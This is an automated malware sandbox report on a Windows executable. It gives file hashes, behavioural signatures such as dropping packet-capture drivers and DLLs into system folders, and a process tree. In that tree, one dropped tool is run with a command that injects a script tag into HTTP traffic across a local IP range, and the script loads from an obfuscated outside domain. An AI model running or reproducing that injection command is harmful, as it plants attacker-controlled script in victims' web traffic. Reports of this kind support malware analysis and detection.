Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
13/07/2024, 16:35
Static task
static1
Behavioral task
behavioral1
Sample
427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe
-
Size
177KB
-
MD5
427b1712db453f7ea97152ee068e056b
-
SHA1
0938a1dc4e2a0a07d307fccc778878a1c5e4c0f6
-
SHA256
6b846ed44f49df14967f7bbc746759b27eb2eb63ea1c9d6ad7f0cc3cc2d54d7e
-
SHA512
2f3c0db42e9f6209afff053b2886db9348810d8efa89a2d277a489b765d3abe5c06b0f6c602c817ae15fc4260425af7491bef15e7cdbbcc388b94ee33aa9522a
-
SSDEEP
3072:KdvRqti5Q1P5klXfzpkN4+Y9VtRVGw3lSiUtP0MwvtETkaLxpk+out:0vUtiK1uXfTt/X1SntP0Mwvt+Lxa+oS
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 4996 360ubak.exe -
Loads dropped DLL 6 IoCs
pid Process 4996 360ubak.exe 4996 360ubak.exe 4996 360ubak.exe 4996 360ubak.exe 4996 360ubak.exe 4996 360ubak.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe File created C:\Windows\SysWOW64\360ubak.exe 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe File created C:\Windows\SysWOW64\npptools.dll 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1664 PING.EXE -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4180 wrote to memory of 4996 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 87 PID 4180 wrote to memory of 4996 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 87 PID 4180 wrote to memory of 4996 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 87 PID 4180 wrote to memory of 4476 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 91 PID 4180 wrote to memory of 4476 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 91 PID 4180 wrote to memory of 4476 4180 427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe 91 PID 4476 wrote to memory of 1664 4476 cmd.exe 93 PID 4476 wrote to memory of 1664 4476 cmd.exe 93 PID 4476 wrote to memory of 1664 4476 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\427b1712db453f7ea97152ee068e056b_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\360ubak.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%67b.P%61ss%69ngG%61s.n%65t/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 12.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1664
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2016
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57ff968a09adfe35719a287c16ae287c5
SHA15187079321bd50d6d6ce483e532f848af3944961
SHA256c6db7656b32bea0548b9946f57242abe89d8c3bfb54f90cc21348717c185fb7c
SHA512962d975694653d0be76c34026379c1f1168154f05401e650a5f4d66ff3c5b4f023d7d14e97e434c4b49eba9287cd95a16f551646c8ac949ce0b1d61f78f23d34
-
Filesize
8.0MB
MD5ada78669e64513903ec644dce8d8a37f
SHA14f834b30e9e9d91fa20b7ac4d295ff218c340897
SHA25688059adab948121734645918956bfe664e54a1106cf12682a050429f014ebb4c
SHA5125780cb197d0961cbcd982e8a1552b6f5ccdb56f0819d36f3c9faf668f6cfb4a8406f5ecbb41113628e1001cad21bb1647de0c59908cc996a64c172106d656863
-
Filesize
53KB
MD5841007a04750a9acb56dd82095300d15
SHA158c1e338bc78a54795a844b559b614004e53d3cb
SHA256a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578
SHA512dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09